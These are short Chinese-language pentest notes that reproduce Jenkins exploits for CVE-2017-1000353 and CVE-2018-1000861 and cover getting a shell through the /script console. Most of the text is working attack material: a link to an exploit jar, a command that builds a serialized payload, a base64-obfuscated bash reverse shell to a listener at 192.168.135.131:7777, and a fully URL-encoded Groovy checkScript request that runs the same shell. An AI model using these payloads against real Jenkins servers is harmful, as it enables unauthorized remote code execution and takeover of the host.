Jenkins
1.漏洞复现
CVE-2017-1000353
影响范围:Jenkins所有主版本、Jenkins LTS所有主版本
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
https://github.com/vulhub/CVE-2017-1000353
将CVE-2017-1000353-1.1-SNAPSHOT-all.jar放入CVE-2017-1000353-master
先用NC监听,然后反弹shell
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" python exploit.py http://192.168.135.131:8080/ jenkins_poc.ser
CVE-2018-1000861
影响范围:Jenkins <=2.153、Jenkins LTS <=2.138.3
将value全部URL编码,value=public class x{public x(){"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}".execute()}}
先用NC监听,然后GET请求反弹shell
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%7b%70%75%62%6c%69%63%20%78%28%29%7b%22%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%45%7a%4e%53%34%78%4d%7a%45%76%4e%7a%63%33%4e%79%41%77%50%69%59%78%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2e%65%78%65%63%75%74%65%28%29%7d%7d
未授权访问或弱口令GetShell
进入后台,路径:/manage
然后访问 /script 脚本执行界面,println "whoami".execute().text